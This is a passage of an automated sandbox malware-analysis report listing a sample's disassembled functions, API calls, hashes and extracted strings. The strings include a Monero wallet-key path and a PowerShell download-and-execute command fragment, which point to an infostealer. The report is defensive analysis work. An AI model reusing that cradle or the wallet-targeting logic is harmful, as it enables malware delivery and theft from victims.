                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                          • String ID:
                          • API String ID: 2540262943-0
                          • Opcode ID: 7d4a85bcac3e942cd6c532db3aece0bb8e86942f509d8c76abb175bafccfe571
                          • Instruction ID: 001519d9a9714673c0544122c8b5052116a98a99dee8a5299fdeb1cd62ac3b78
                          • Opcode Fuzzy Hash: 7d4a85bcac3e942cd6c532db3aece0bb8e86942f509d8c76abb175bafccfe571
                          • Instruction Fuzzy Hash: F931A8B294021867CB51FBB0DC89EED737CBB99704F408589B31996081EF749789CF91
                          Function 00172C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0017A740: lstrcpy.KERNEL32(00180E17,00000000), ref: 0017A788
                            • Part of subcall function 0017A9B0: lstrlen.KERNEL32(?,00CC9188,?,\Monero\wallet.keys,00180E17), ref: 0017A9C5
                            • Part of subcall function 0017A9B0: lstrcpy.KERNEL32(00000000), ref: 0017AA04
                            • Part of subcall function 0017A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0017AA12
                            • Part of subcall function 0017A920: lstrcpy.KERNEL32(00000000,?), ref: 0017A972
                            • Part of subcall function 0017A920: lstrcat.KERNEL32(00000000), ref: 0017A982
                            • Part of subcall function 0017A8A0: lstrcpy.KERNEL32(?,00180E17), ref: 0017A905
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00172D85
                          Strings
                          • ')", xrefs: 00172CB3
                          • <, xrefs: 00172D39
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00172D04
                          • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00172CC4
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                          • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          • API String ID: 3031569214-898575020
                          • Opcode ID: 4f5133a8a047483c008bb06e9b63a6464d775462dc5314c513948547dbed9253
                          • Instruction ID: c62b33680ac0851a8a9f75850f11002841e952ac83157daa14d77334ac538f7e
                          • Opcode Fuzzy Hash: 4f5133a8a047483c008bb06e9b63a6464d775462dc5314c513948547dbed9253
                          • Instruction Fuzzy Hash: 3641D471C501089ADB19FFA0C896FDEBB74AF64300F908119F11AB7191DF746A4ACF92
                          Function 00169E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                          Download Yara Rule
                          APIs
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00169F41
                            • Part of subcall function 0017A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0017A7E6
                            • Part of subcall function 0017A740: lstrcpy.KERNEL32(00180E17,00000000), ref: 0017A788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$AllocLocal
                          • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                          • API String ID: 4171519190-1096346117
                          • Opcode ID: c2918b9303ecdaba0840fdf673a3a594636216127824df60c9e769f2f7712577
                          • Instruction ID: f41245940dc087d817c67aeae90db54deb9901b0fc6b999e0e9fd45d6ed17252
                          • Opcode Fuzzy Hash: c2918b9303ecdaba0840fdf673a3a594636216127824df60c9e769f2f7712577
                          • Instruction Fuzzy Hash: 48614171A10248EBDB18EFA4CC96FEE7779AF95304F408418F90A9F191EB746A05CF52
                          Function 001740B0 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON
                          Download Yara Rule
                          APIs
                          • RegOpenKeyExA.ADVAPI32(80000001,00CCE098,00000000,00020119,?), ref: 001740F4
                          • RegQueryValueExA.ADVAPI32(?,00CCF4A0,00000000,00000000,00000000,000000FF), ref: 00174118
                          • RegCloseKey.ADVAPI32(?), ref: 00174122
                          • lstrcat.KERNEL32(?,00000000), ref: 00174147
                          • lstrcat.KERNEL32(?,00CCF578), ref: 0017415B
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$CloseOpenQueryValue
                          • String ID:
                          • API String ID: 690832082-0
                          • Opcode ID: b7533108f1ed824aa3db29d399d6e36becc19b7f0203d77b6b4aea18c83655fd
                          • Instruction ID: d8c8eabe359a263eec1dc3ea00e77d4df6baa105ee222feeb0465572119cf655
                          • Opcode Fuzzy Hash: b7533108f1ed824aa3db29d399d6e36becc19b7f0203d77b6b4aea18c83655fd
                          • Instruction Fuzzy Hash: 5F41B7B79001086BDB15EBA0DC46FFE733DAB99300F008959B61A96181EF755B88CB92
                          Function 00177E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00177E37
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00177E3E
                          • RegOpenKeyExA.ADVAPI32(80000002,00CBBD68,00000000,00020119,?), ref: 00177E5E
                          • RegQueryValueExA.ADVAPI32(?,00CCE238,00000000,00000000,000000FF,000000FF), ref: 00177E7F
                          • RegCloseKey.ADVAPI32(?), ref: 00177E92
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID:
                          • API String ID: 3225020163-0
                          • Opcode ID: 64ce482c958b5b92a3198332ee6d0cc4df49004a18368e219f57241e75e96e3a
                          • Instruction ID: f724e79095bdd539a4c09027e5f20509e22b6a7931d13e5a3c9dfd51c4749ec6
                          • Opcode Fuzzy Hash: 64ce482c958b5b92a3198332ee6d0cc4df49004a18368e219f57241e75e96e3a
                          • Instruction Fuzzy Hash: 1F119EB2A44609EBD705CFD4DD49FBBBBBCEB09B00F108119F605A7280DB785800CBA1
                          Function 00179260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                          Download Yara Rule
                          APIs
                          • StrStrA.SHLWAPI(00CCF020,?,?,?,0017140C,?,00CCF020,00000000), ref: 0017926C
                          • lstrcpyn.KERNEL32(003AAB88,00CCF020,00CCF020,?,0017140C,?,00CCF020), ref: 00179290
                          • lstrlen.KERNEL32(?,?,0017140C,?,00CCF020), ref: 001792A7
                          • wsprintfA.USER32 ref: 001792C7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpynlstrlenwsprintf
                          • String ID: %s%s
                          • API String ID: 1206339513-3252725368
                          • Opcode ID: 7f9ec14cd2061ff96dbebf78d74e034dc558420a8ddac94c28d41e4be273278c
                          • Instruction ID: b3d31e488331b2b04974aa7c978029daee7b5711abb6e1e616b167d24974f3da
                          • Opcode Fuzzy Hash: 7f9ec14cd2061ff96dbebf78d74e034dc558420a8ddac94c28d41e4be273278c
                          • Instruction Fuzzy Hash: 9B01D676500608FFCB05DFECC998EAE7BB9EB49354F108148F9099B245C731AA80DBA1
                          Function 001612A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001612B4
                          • RtlAllocateHeap.NTDLL(00000000), ref: 001612BB
                          • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 001612D7
                          • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 001612F5
                          • RegCloseKey.ADVAPI32(?), ref: 001612FF
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID:
                          • API String ID: 3225020163-0
                          • Opcode ID: 638b657b8f09ccf2597fa936875616d5ca8910969c372298cf2b55b5c1462489
                          • Instruction ID: 658a0a87bd71a1e4e3547b68fba7ed7e0b2bcd1e9cc44497a5160cc5325df1a5
                          • Opcode Fuzzy Hash: 638b657b8f09ccf2597fa936875616d5ca8910969c372298cf2b55b5c1462489
                          • Instruction Fuzzy Hash: EB011DBAA40208BBDB05DFE4DC49FAEBBBCEB48701F108159FA0597280D7759A01CB51
                          Function 0017C84E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: String___crt$Type
                          • String ID:
                          • API String ID: 2109742289-3916222277
                          • Opcode ID: 4bd456c2efe7ac49db4f25d68bf422de458c1489d814fb8c88c68c24e828d8d9
                          • Instruction ID: 4481d7cdd93cc1626bdaba18698fba381ff4c860c9cd1252986e91b36e88a22c
                          • Opcode Fuzzy Hash: 4bd456c2efe7ac49db4f25d68bf422de458c1489d814fb8c88c68c24e828d8d9
                          • Instruction Fuzzy Hash: 8441E5B110079C5EDB258B248C84BFBBBF99F45708F1484ECEA8E86182D3719A448FA0
                          Function 00176630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                          Download Yara Rule
                          APIs
                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00176663
                            • Part of subcall function 0017A740: lstrcpy.KERNEL32(00180E17,00000000), ref: 0017A788
                            • Part of subcall function 0017A9B0: lstrlen.KERNEL32(?,00CC9188,?,\Monero\wallet.keys,00180E17), ref: 0017A9C5
                            • Part of subcall function 0017A9B0: lstrcpy.KERNEL32(00000000), ref: 0017AA04
                            • Part of subcall function 0017A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0017AA12
                            • Part of subcall function 0017A8A0: lstrcpy.KERNEL32(?,00180E17), ref: 0017A905
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00176726
                          • ExitProcess.KERNEL32 ref: 00176755
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                          • String ID: <
                          • API String ID: 1148417306-4251816714
                          • Opcode ID: 8373b37e679be65be00182afb4e9c622c1fd32a1bd9f261d7e0cfc4f3bbce45c
                          • Instruction ID: 4a71005ca369c2d731f33bf3fc1c82e6b79f71eab707506ebd3bac7eb62d27f7
                          • Opcode Fuzzy Hash: 8373b37e679be65be00182afb4e9c622c1fd32a1bd9f261d7e0cfc4f3bbce45c
                          • Instruction Fuzzy Hash: FB313CB2801208ABDB55EB90DC95FDE777CAF94300F808198F31966191DF746B48CF5A
                          Function 001787C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00180E28,00000000,?), ref: 0017882F
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00178836
                          • wsprintfA.USER32 ref: 00178850
                            • Part of subcall function 0017A740: lstrcpy.KERNEL32(00180E17,00000000), ref: 0017A788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcesslstrcpywsprintf
                          • String ID: %dx%d
                          • API String ID: 1695172769-2206825331
                          • Opcode ID: de8fd8d9cd8349275b3d0c4285bc076cd6376f024f43f7e7e0029280e999f7da
                          • Instruction ID: 60152742c15be4ead0ee804a53fd54526fae9e1e7999fb463a801483b220f3db
                          • Opcode Fuzzy Hash: de8fd8d9cd8349275b3d0c4285bc076cd6376f024f43f7e7e0029280e999f7da
                          • Instruction Fuzzy Hash: 3E21FEB2A40608AFDB05DF94DD49FAEBBBCFB49B11F104119F605A7290C7799901CBA1
                          Function 00178D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0017951E,00000000), ref: 00178D5B
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00178D62
                          • wsprintfW.USER32 ref: 00178D78
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
